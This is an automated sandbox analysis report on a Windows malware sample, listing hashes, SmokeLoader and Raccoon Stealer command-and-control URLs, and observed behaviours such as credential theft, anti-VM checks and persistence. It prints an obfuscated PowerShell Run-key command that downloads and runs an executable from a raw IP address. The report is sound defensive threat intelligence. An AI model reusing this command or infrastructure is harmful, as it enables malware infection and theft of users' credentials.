Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-08-2021 19:56
Static task
static1
Behavioral task
behavioral1
Sample
d4537efd24d9b886648bd32b6ce4da99.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
d4537efd24d9b886648bd32b6ce4da99.exe
Resource
win10v20210408
General
-
Target
d4537efd24d9b886648bd32b6ce4da99.exe
-
Size
207KB
-
MD5
d4537efd24d9b886648bd32b6ce4da99
-
SHA1
1a014d098b8ef7ecef5ec124ddef0030c42da509
-
SHA256
5d372a19bbdae072e4fb4ff9deded30dbb40f4a74b54fbf77888a1523e864129
-
SHA512
e0db39cd1165f6d34e33f4a31e71a1ff69f48cf3baf291cf873b91954e608b89dd8a89a4f1cafa279936cf22abf4e901290816d649bcbc143e7977618d6e30e4
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
2ca2376c561d1af7f8b9e6f3256b06220a3db187
-
url4cnc
https://telete.in/johnyes13
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4952 2752 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4976 2752 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2688 2752 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5028 2752 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 716 2752 schtasks.exe -
Raccoon Stealer Payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1344-196-0x00000000048F0000-0x0000000004983000-memory.dmp family_raccoon behavioral2/memory/1344-197-0x0000000000400000-0x0000000002CB1000-memory.dmp family_raccoon behavioral2/memory/2728-201-0x0000000004900000-0x0000000004991000-memory.dmp family_raccoon behavioral2/memory/2728-203-0x0000000000400000-0x0000000002CB0000-memory.dmp family_raccoon behavioral2/memory/4184-261-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/4184-268-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\28A9.exe family_redline C:\Users\Admin\AppData\Local\Temp\28A9.exe family_redline C:\Users\Admin\AppData\Local\Temp\4675.exe family_redline C:\Users\Admin\AppData\Local\Temp\4675.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 2732 created 1344 2732 WerFault.exe 4ADB.exe PID 3836 created 2728 3836 WerFault.exe 4FCE.exe -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 33 4124 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 53 IoCs
Processes:
1974.exe1EE4.exe1EE4.tmp1EE4.exe1EE4.tmp28A9.exe2CF0.exe2FFE.exefsucenter.exe4675.exeRuntimebroker.exe4ADB.exe4FCE.exe2FFE.execheat.exeDatabase.exeDatabase.exeinstall.exeHostData.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeDatabase.exeDatabase.exeDatabase.exefsucenter.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 188 1974.exe 1976 1EE4.exe 2300 1EE4.tmp 1164 1EE4.exe 2064 1EE4.tmp 2248 28A9.exe 4036 2CF0.exe 4040 2FFE.exe 2836 fsucenter.exe 2224 4675.exe 2888 Runtimebroker.exe 1344 4ADB.exe 2728 4FCE.exe 4184 2FFE.exe 4636 cheat.exe 4820 Database.exe 4832 Database.exe 4872 install.exe 4924 HostData.exe 4744 Database.exe 2520 Database.exe 5064 Database.exe 2100 Database.exe 4144 Database.exe 4064 Database.exe 4324 Database.exe 2988 Database.exe 4480 Database.exe 4572 Database.exe 4644 Database.exe 4700 Database.exe 2252 Database.exe 4072 Database.exe 4456 Database.exe 4540 Database.exe 4428 Database.exe 2364 Database.exe 4736 install.exe 4868 Database.exe 4964 Database.exe 5072 Database.exe 3884 fsucenter.exe 1704 Database.exe 4268 Database.exe 4620 Database.exe 4228 Database.exe 4064 Database.exe 4344 Database.exe 4416 Database.exe 4252 Database.exe 4376 Database.exe 4200 Database.exe 4124 Database.exe -
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
4675.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe28A9.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4675.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 28A9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 28A9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4675.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe -
Deletes itself 1 IoCs
Processes:
pid process 2996 -
Drops startup file 1 IoCs
Processes:
Runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 1 IoCs
Processes:
fsucenter.exepid process 2836 fsucenter.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\28A9.exe themida C:\Users\Admin\AppData\Local\Temp\28A9.exe themida behavioral2/memory/2248-153-0x0000000000EC0000-0x0000000000EC1000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\4675.exe themida C:\Users\Admin\AppData\Local\Temp\4675.exe themida behavioral2/memory/2224-183-0x0000000000EB0000-0x0000000000EB1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
powershell.exeinstall.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\catsrvps\\lsass.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fsucenter = "\"C:\\Users\\Admin\\AppData\\Roaming\\BI Video Controller for x86 systems\\log20210811_215406\\fsucenter.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\resources\\ShellExperienceHost.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\regedit\\explorer.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WerFault = "\"C:\\Windows\\SysWOW64\\wcnwiz\\WerFault.exe\"" install.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe28A9.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe4675.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 28A9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4675.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 5 IoCs
Processes:
install.exedescription ioc process File created C:\Windows\SysWOW64\wcnwiz\WerFault.exe install.exe File created C:\Windows\SysWOW64\wcnwiz\ee201eac4591f0b16735de891f3d31be299085b8 install.exe File created C:\Windows\SysWOW64\catsrvps\lsass.exe install.exe File opened for modification C:\Windows\SysWOW64\catsrvps\lsass.exe install.exe File created C:\Windows\SysWOW64\catsrvps\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9 install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
28A9.exe4675.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 2248 28A9.exe 2224 4675.exe 4820 Database.exe 4820 Database.exe 4820 Database.exe 4832 Database.exe 4832 Database.exe 4832 Database.exe 4744 Database.exe 4744 Database.exe 4744 Database.exe 2520 Database.exe 2520 Database.exe 2520 Database.exe 5064 Database.exe 5064 Database.exe 5064 Database.exe 2100 Database.exe 2100 Database.exe 2100 Database.exe 4144 Database.exe 4144 Database.exe 4144 Database.exe 4064 Database.exe 4064 Database.exe 4064 Database.exe 4324 Database.exe 4324 Database.exe 4324 Database.exe 2988 Database.exe 2988 Database.exe 2988 Database.exe 4480 Database.exe 4480 Database.exe 4480 Database.exe 4572 Database.exe 4572 Database.exe 4572 Database.exe 4644 Database.exe 4644 Database.exe 4644 Database.exe 4700 Database.exe 4700 Database.exe 4700 Database.exe 2252 Database.exe 2252 Database.exe 2252 Database.exe 4072 Database.exe 4072 Database.exe 4072 Database.exe 4456 Database.exe 4456 Database.exe 4456 Database.exe 4540 Database.exe 4540 Database.exe 4540 Database.exe 4428 Database.exe 4428 Database.exe 4428 Database.exe 2364 Database.exe 2364 Database.exe 2364 Database.exe 4868 Database.exe 4868 Database.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
d4537efd24d9b886648bd32b6ce4da99.exe2FFE.exeinstall.exedescription pid process target process PID 628 set thread context of 3928 628 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 4040 set thread context of 4184 4040 2FFE.exe 2FFE.exe PID 4872 set thread context of 4736 4872 install.exe install.exe -
Drops file in Windows directory 4 IoCs
Processes:
install.exedescription ioc process File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources\f8c8f1285d826bc63910aaf97db97186ba642b4f install.exe File created C:\Windows\regedit\explorer.exe install.exe File created C:\Windows\regedit\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 install.exe File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources\ShellExperienceHost.exe install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3916 4036 WerFault.exe 2CF0.exe 720 4036 WerFault.exe 2CF0.exe 3836 4036 WerFault.exe 2CF0.exe 2736 4036 WerFault.exe 2CF0.exe 1232 4036 WerFault.exe 2CF0.exe 1176 4036 WerFault.exe 2CF0.exe 2744 2888 WerFault.exe Runtimebroker.exe 3008 1344 WerFault.exe 4ADB.exe 1336 2888 WerFault.exe Runtimebroker.exe 1144 2888 WerFault.exe Runtimebroker.exe 980 1344 WerFault.exe 4ADB.exe 3960 2888 WerFault.exe Runtimebroker.exe 1532 1344 WerFault.exe 4ADB.exe 876 2728 WerFault.exe 4FCE.exe 784 1344 WerFault.exe 4ADB.exe 2980 2888 WerFault.exe Runtimebroker.exe 3920 2728 WerFault.exe 4FCE.exe 2732 1344 WerFault.exe 4ADB.exe 2860 2888 WerFault.exe Runtimebroker.exe 2064 2728 WerFault.exe 4FCE.exe 744 2888 WerFault.exe Runtimebroker.exe 3916 2728 WerFault.exe 4FCE.exe 3836 2728 WerFault.exe 4FCE.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
d4537efd24d9b886648bd32b6ce4da99.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d4537efd24d9b886648bd32b6ce4da99.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d4537efd24d9b886648bd32b6ce4da99.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d4537efd24d9b886648bd32b6ce4da99.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5028 schtasks.exe 716 schtasks.exe 4952 schtasks.exe 4976 schtasks.exe 2688 schtasks.exe -
Processes:
fsucenter.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 fsucenter.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e fsucenter.exe -
